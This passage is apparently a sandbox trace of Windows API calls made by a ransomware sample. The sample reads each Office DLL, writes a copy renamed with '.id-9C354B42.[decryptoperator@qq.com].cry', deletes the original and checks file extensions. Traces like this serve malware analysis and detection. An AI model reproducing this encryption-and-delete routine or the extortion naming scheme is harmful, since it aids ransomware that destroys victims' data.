liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.079] SetEndOfFile (hFile=0x230) returned 1 [0054.087] CloseHandle (hObject=0x230) returned 1 [0054.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.087] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 1 [0054.088] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString=".doc") returned 4 [0054.089] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString=".docx") returned 5 [0054.089] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0054.089] lstrlenW (lpString=".pdf") returned 4 [0054.089] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString=".xls") returned 4 [0054.089] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString=".xlsx") returned 5 [0054.089] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0054.089] lstrlenW (lpString=".ppt") returned 4 [0054.089] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString=".zip") returned 4 [0054.089] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString=".rar") returned 4 [0054.089] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString=".bz2") returned 4 [0054.089] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.089] lstrlenW (lpString=".7z") returned 3 [0054.089] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString=".dbf") returned 4 [0054.089] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString=".1cd") returned 4 [0054.089] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString=".jpg") returned 4 [0054.089] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.089] lstrlenW (lpString=".doc") returned 4 [0054.089] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.089] lstrlenW (lpString=".docx") returned 5 [0054.090] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0054.090] lstrlenW (lpString=".pdf") returned 4 [0054.090] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.090] lstrlenW (lpString=".xls") returned 4 [0054.090] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.090] lstrlenW (lpString=".xlsx") returned 5 [0054.090] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0054.090] lstrlenW (lpString=".ppt") returned 4 [0054.090] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.090] lstrlenW (lpString=".zip") returned 4 [0054.090] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.090] lstrlenW (lpString=".rar") returned 4 [0054.090] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.090] lstrlenW (lpString=".bz2") returned 4 [0054.090] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.090] lstrlenW (lpString=".7z") returned 3 [0054.090] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.090] lstrlenW (lpString=".dbf") returned 4 [0054.090] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.090] lstrlenW (lpString=".1cd") returned 4 [0054.090] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0054.090] lstrlenW (lpString=".jpg") returned 4 [0054.090] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.091] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.091] lstrlenW (lpString="ACEODTXT.DLL") returned 12 [0054.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0054.091] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=15800) returned 1 [0054.091] CloseHandle (hObject=0x164) returned 1 [0054.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 0x20 [0054.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0054.091] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.091] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.092] GetLastError () returned 0x0 [0054.092] ReadFile (in: hFile=0x164, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0054.105] WriteFile (in: hFile=0x230, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0054.107] ReadFile (in: hFile=0x164, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.107] WriteFile (in: hFile=0x230, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.107] SetEndOfFile (hFile=0x230) returned 1 [0054.119] CloseHandle (hObject=0x230) returned 1 [0054.120] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.120] SetEndOfFile (hFile=0x164) returned 1 [0054.120] CloseHandle (hObject=0x164) returned 1 [0054.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.121] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 1 [0054.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.236] lstrlenW (lpString=".doc") returned 4 [0054.236] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.236] lstrlenW (lpString=".docx") returned 5 [0054.236] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0054.236] lstrlenW (lpString=".pdf") returned 4 [0054.236] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.236] lstrlenW (lpString=".xls") returned 4 [0054.236] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.236] lstrlenW (lpString=".xlsx") returned 5 [0054.236] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0054.236] lstrlenW (lpString=".ppt") returned 4 [0054.236] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.236] lstrlenW (lpString=".zip") returned 4 [0054.236] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.236] lstrlenW (lpString=".rar") returned 4 [0054.236] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.236] lstrlenW (lpString=".bz2") returned 4 [0054.236] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.236] lstrlenW (lpString=".7z") returned 3 [0054.236] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString=".dbf") returned 4 [0054.237] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString=".1cd") returned 4 [0054.237] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString=".jpg") returned 4 [0054.237] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString=".doc") returned 4 [0054.237] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.237] lstrlenW (lpString=".docx") returned 5 [0054.237] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0054.237] lstrlenW (lpString=".pdf") returned 4 [0054.237] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.237] lstrlenW (lpString=".xls") returned 4 [0054.237] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.237] lstrlenW (lpString=".xlsx") returned 5 [0054.237] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0054.237] lstrlenW (lpString=".ppt") returned 4 [0054.237] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString=".zip") returned 4 [0054.237] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.237] lstrlenW (lpString=".rar") returned 4 [0054.237] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.237] lstrlenW (lpString=".bz2") returned 4 [0054.237] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.237] lstrlenW (lpString=".7z") returned 3 [0054.237] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString=".dbf") returned 4 [0054.237] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.237] lstrlenW (lpString=".1cd") returned 4 [0054.238] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0054.238] lstrlenW (lpString=".jpg") returned 4 [0054.238] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.238] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.238] lstrlenW (lpString="ACERCLR.DLL") returned 11 [0054.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.247] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=55744) returned 1 [0054.247] CloseHandle (hObject=0x230) returned 1 [0054.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 0x20 [0054.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.247] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.247] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0054.248] GetLastError () returned 0x0 [0054.248] ReadFile (in: hFile=0x230, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xd9c0, lpOverlapped=0x0) returned 1 [0054.325] WriteFile (in: hFile=0x164, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xd9d0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xd9d0, lpOverlapped=0x0) returned 1 [0054.326] ReadFile (in: hFile=0x230, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.326] WriteFile (in: hFile=0x164, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.327] SetEndOfFile (hFile=0x164) returned 1 [0054.327] CloseHandle (hObject=0x164) returned 1 [0054.327] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.327] SetEndOfFile (hFile=0x230) returned 1 [0054.328] CloseHandle (hObject=0x230) returned 1 [0054.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.328] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 1 [0054.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString=".doc") returned 4 [0054.329] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString=".docx") returned 5 [0054.329] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0054.329] lstrlenW (lpString=".pdf") returned 4 [0054.329] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString=".xls") returned 4 [0054.329] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString=".xlsx") returned 5 [0054.329] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0054.329] lstrlenW (lpString=".ppt") returned 4 [0054.329] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString=".zip") returned 4 [0054.329] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString=".rar") returned 4 [0054.329] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString=".bz2") returned 4 [0054.329] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.329] lstrlenW (lpString=".7z") returned 3 [0054.329] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString=".dbf") returned 4 [0054.329] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString=".1cd") returned 4 [0054.329] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString=".jpg") returned 4 [0054.329] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.329] lstrlenW (lpString=".doc") returned 4 [0054.329] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.329] lstrlenW (lpString=".docx") returned 5 [0054.329] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0054.329] lstrlenW (lpString=".pdf") returned 4 [0054.330] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.330] lstrlenW (lpString=".xls") returned 4 [0054.330] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.330] lstrlenW (lpString=".xlsx") returned 5 [0054.330] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0054.330] lstrlenW (lpString=".ppt") returned 4 [0054.330] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.330] lstrlenW (lpString=".zip") returned 4 [0054.330] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.330] lstrlenW (lpString=".rar") returned 4 [0054.330] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.330] lstrlenW (lpString=".bz2") returned 4 [0054.330] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.330] lstrlenW (lpString=".7z") returned 3 [0054.330] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.330] lstrlenW (lpString=".dbf") returned 4 [0054.330] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.330] lstrlenW (lpString=".1cd") returned 4 [0054.330] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0054.330] lstrlenW (lpString=".jpg") returned 4 [0054.330] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.330] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.330] lstrlenW (lpString="ACEWSS.DLL") returned 10 [0054.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.441] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=318368) returned 1 [0054.441] CloseHandle (hObject=0x224) returned 1 [0054.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll")) returned 0x20 [0054.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.441] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.441] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0054.442] GetLastError () returned 0x0 [0054.442] ReadFile (in: hFile=0x224, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x4dba0, lpOverlapped=0x0) returned 1 [0054.634] WriteFile (in: hFile=0x164, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x4dbb0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x4dbb0, lpOverlapped=0x0) returned 1 [0054.641] ReadFile (in: hFile=0x224, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.641] WriteFile (in: hFile=0x164, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0054.642] SetEndOfFile (hFile=0x164) returned 1 [0054.642] CloseHandle (hObject=0x164) returned 1 [0054.642] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.642] SetEndOfFile (hFile=0x224) returned 1 [0054.645] CloseHandle (hObject=0x224) returned 1 [0054.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.645] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll")) returned 1 [0054.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") 